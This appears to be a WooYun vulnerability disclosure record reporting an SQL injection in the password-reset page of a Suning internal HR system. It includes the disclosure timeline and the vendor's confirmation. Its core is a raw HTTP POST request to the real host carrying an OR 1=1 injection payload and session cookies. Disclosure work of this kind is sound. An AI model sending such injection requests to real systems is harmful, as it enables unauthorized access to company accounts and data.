当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-086354

漏洞标题:苏宁易购某重要内部业务系统存在SQL注入漏洞(疑似用友的产品)

相关厂商:江苏苏宁易购电子商务有限公司

漏洞作者: sex is not show

提交时间:2014-12-08 11:28

修复时间:2015-01-22 11:30

公开时间:2015-01-22 11:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-08: 细节已通知厂商并且等待厂商处理中
2014-12-09: 厂商已经确认,细节仅向厂商公开
2014-12-19: 细节向核心白帽子及相关领域专家公开
2014-12-29: 细节向普通白帽子公开
2015-01-08: 细节向实习白帽子公开
2015-01-22: 细节向公众公开

简要描述:

RT

详细说明:

http://erp.suning.com.cn
问题在:http://erp.suning.com.cn/hrss/login.jsp的忘记密码处
直接单引号报错:

1.jpg


构造post表单:

POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Accept: */*
Accept-Language: zh-cn
Pragma: no-cache
Referer: http://erp.suning.com.cn/hrss/ResetPwd.jsp
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E)
Host: erp.suning.com.cn
Content-Length: 564
Proxy-Connection: Keep-Alive
Cookie: JSESSIONID=7F1ED5573DF0B75E47208253DC4E9C31.server; JSESSIONID=9ED95574617945FA17622157C3C839D3.server
__type=updateData&__viewInstanceId=nc.bs.hrss.login.ResetPassword~nc.bs.hrss.login.ResetPasswordViewModel&__xml=<rpc%20transaction%3d%2210%22%20method%3d%22resetPwd%22><def><dataset%20type%3d%22Custom%22%20id%3d%22dsResetPwd%22><f%20name%3d%22user%22></f><f%20name%3d%22ID%22></f></dataset></def><data><rs%20dataset%3d%22dsResetPwd%22><r%20id%3d%2210009%22%20state%3d%22insert%22><n><v>-1%26apos;%20OR%201%3d1%20*%20--%20</v><v>e</v></n></r></rs></data><vps><p%20name%3d%22__profileKeys%22>findPwd%253B15b021628b8411d33569071324dc1b37</p></vps></rpc>&1418007611954


1.jpg

漏洞证明:

1.jpg

修复方案:

补啊~~

版权声明:转载请注明来源 sex is not show@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-12-09 14:14

厂商回复:

感谢提交,已经移交相关集团公司处理。

最新状态:

暂无